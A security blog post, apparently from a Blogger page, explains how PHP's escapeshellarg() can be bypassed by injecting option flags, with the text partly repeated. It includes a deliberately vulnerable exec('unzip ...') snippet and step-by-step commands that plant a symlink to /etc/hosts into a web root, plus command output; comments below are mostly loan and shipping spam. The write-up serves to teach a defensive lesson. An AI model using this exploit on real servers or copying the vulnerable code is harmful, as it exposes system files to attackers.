PHP function escapeshellarg() is the most popular way to prevent OS Commanding threats during shell calls by escaping command arguments.
But this function is not a panacea, and you should keep this in mind when using it.
Let's try to understand what this escaping function is doing:
So, looks like ideal solution, right?
But there are no restrictions on characters in this line argument. For example, command line argument after escapeshellarg() filtration can be a command key (-a, -o and others). This is the first trick.
Second trick is argument parser which embeded in command line utilities.
Feel it:
$command -arg param
$command -arg=param
$command '-arg=param'
$command '-arg param'
There are no differences between these four examples for most command line utilities! Pay your attention to two last command lines, - you can put these lines after escapeshellarg() filtration.
Example:
$ unzip -j '-d/var/www/' *.dat -d /tmp
This command will extract files with masks '*.dat' (all matches after first), '-d', '/tmp' from ZIP arhieve with filename *.dat to output folder /var/www.
Preparing exploit:
$ ln -s /etc/hosts 2.dat
$ zip --symlinks 1.zip 2.dat
$ mv 1.zip 1.dat
You can also add file with name '-d' to archive to make attack more stable (w/o needs of upload 1.dat and 2.dat both for exploit).
Try it:
$ unzip -j '-d/var/www' *.dat -d /tmp
Archive: 1.dat
linking: /var/www/2.dat -> /etc/hosts
finishing deferred symbolic links:
/var/www/2.dat -> /etc/hosts
caution: filename not matched: -d
caution: filename not matched: /tmp
Now you can read files by +FollowSymlinks -------------->
But this function is not a panacea, and you should keep this in mind when using it.
Let's try to understand what this escaping function is doing:
- Performs framing quotes string: aaa -> 'aaa'
- Cuts bytes 0x00, 0x80-0xFF
- Escape single quotes: ' -> ''\'''
So, looks like ideal solution, right?
But there are no restrictions on characters in this line argument. For example, command line argument after escapeshellarg() filtration can be a command key (-a, -o and others). This is the first trick.
Second trick is argument parser which embeded in command line utilities.
Feel it:
$command -arg param
$command -arg=param
$command '-arg=param'
$command '-arg param'
There are no differences between these four examples for most command line utilities! Pay your attention to two last command lines, - you can put these lines after escapeshellarg() filtration.
Example:
<?php
exec('unzip -j '.escapeshellarg($_GET['zip_arch_name']).' *.dat -d /tmp');
?>
Is it code protected from hackers? Try to check this in terminal by typing:$ unzip -j '-d/var/www/' *.dat -d /tmp
This command will extract files with masks '*.dat' (all matches after first), '-d', '/tmp' from ZIP arhieve with filename *.dat to output folder /var/www.
Preparing exploit:
$ ln -s /etc/hosts 2.dat
$ zip --symlinks 1.zip 2.dat
$ mv 1.zip 1.dat
You can also add file with name '-d' to archive to make attack more stable (w/o needs of upload 1.dat and 2.dat both for exploit).
Try it:
Archive: 1.dat
linking: /var/www/2.dat -> /etc/hosts
finishing deferred symbolic links:
/var/www/2.dat -> /etc/hosts
caution: filename not matched: -d
caution: filename not matched: /tmp
Now you can read files by +FollowSymlinks -------------->
A little bit more clearer please?
ОтветитьУдалитьso you can inject '-d/var/www/' which will be treated as an argument and create an archive in /var/www....what's the deal with the symlinks?
Mmm... Can't understand your question...
Удалить"Now you can read files by +FollowSymlinks "
In the event that you auto needs repairs and you just don't have the money to cover it, you might need to look for a payday credit to get your auto up and running.
ОтветитьУдалитьPayday Loans San-diego
Possibly the truck blows a tire or has carburetor inconvenience. Whatever the issue, it prompts a budgetary catastrophe, as bills heap up and the influenced individual can't pay.
ОтветитьУдалитьCash Advance
Just on the off chance that you acquire through payday advances, ensure that you pay on time with the goal that you won't have issues later on, particularly that concerning your credit records.
ОтветитьУдалитьCash Advance
Subsequent to deciding whether you are qualified or not, you can act properly so you would now be able to back your money issue. Simply be constant in your hunt and you can locate the correct payday credit on the web.
ОтветитьУдалитьCar Title Loans
This is very nice blog.Thanks to shear it.You can also visit my site pest control centennial .We will help you to protect your family.
ОтветитьУдалитьThanks for sharing, nice post! Post really provice useful information!
ОтветитьУдалитьGiaonhan247 chuyên dịch vụ gửi hàng đi canada, gửi hàng đi úc với dịch vụ vận chuyển hàng đi campuchia hướng dẫn cách mua đồng hồ trên amazon với chi tiết bảng giá gửi hàng đi mỹ giá rẻ.